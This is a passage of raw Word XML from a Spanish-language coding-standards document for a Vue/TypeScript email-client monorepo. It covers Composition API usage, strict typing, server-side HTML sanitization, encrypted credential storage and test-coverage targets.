        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">debe cumplirlas.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="241" w:name="composition-api-y-script-setup"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.3.1 Composition API y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script setup&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Todo componente Vue usa Composition API con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script setup&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Options API está prohibido. Los composables son la unidad de reutilización de lógica, no mixins.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// ✅ CORRECTO</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">script setup lang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"ts"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { ref</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> computed } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'vue'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { useEmailStore } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'@/stores/email'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> store </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">useEmailStore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> selected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store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">selectedEmails</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> toggle </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store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toggleSelect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(id)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// ❌ INCORRECTO</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">script lang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"ts"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">() { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { count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methods</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">increment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">() { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">count</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">++;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> } }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="241"/>
    <w:bookmarkStart w:id="242" w:name="typescript-strict"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.3.2 TypeScript Strict</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tsconfig.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">base habilita</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">strict: true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en todo el monorepo. No se permite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">any</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">implícito. Los tipos de Mongoose se definen explícitamente; no se usa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">as any</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para silenciar errores.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// ✅ CORRECTO</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> EmailDoc {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  _id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> Types</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  subject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from</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address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w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> email </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> Email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">findById</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(id)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">lean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">EmailDoc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// ❌ INCORRECTO</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> email </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> Email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">findById</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(id) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="242"/>
    <w:bookmarkStart w:id="243" w:name="sanitización-server-side-obligatoria"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.3.3 Sanitización Server-Side Obligatoria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ningún contenido HTML de email llega al frontend sin pasar por</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sanitize-html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en el backend. El iframe de visualización usa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sandbox="allow-same-origin"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">allow-scripts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. CSP headers bloquean inline scripts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// ✅ CORRECTO: Sanitizar antes de almacenar</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">bodyHtmlSanitized</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sanitizeHtml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(parsed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> SANITIZE_CONFIG)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="243"/>
    <w:bookmarkStart w:id="244" w:name="credenciales-encriptadas"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.3.4 Credenciales Encriptadas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Las credenciales IMAP/SMTP se almacenan exclusivamente con AES-256-GCM. La clave de encriptación (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ENCRYPTION_KEY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) nunca se commitea — se inyecta vía Docker secrets o variable de entorno en runtime. La clave JWT (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT_SECRET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) tiene requisito mínimo de 32 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// ✅ CORRECTO: Verificar longitud de clave en startup</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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ENCRYPTION_KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">||</w:t>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ENCRYPTION_KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'hex'</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32</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'ENCRYPTION_KEY must be a 64-char hex string (32 bytes)'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="244"/>
    <w:bookmarkStart w:id="245" w:name="cobertura-de-tests-85"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.3.5 Cobertura de Tests &gt;= 85%</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Tipo de archivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cobertura mínima</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Services (lógica de negocio)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">90%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
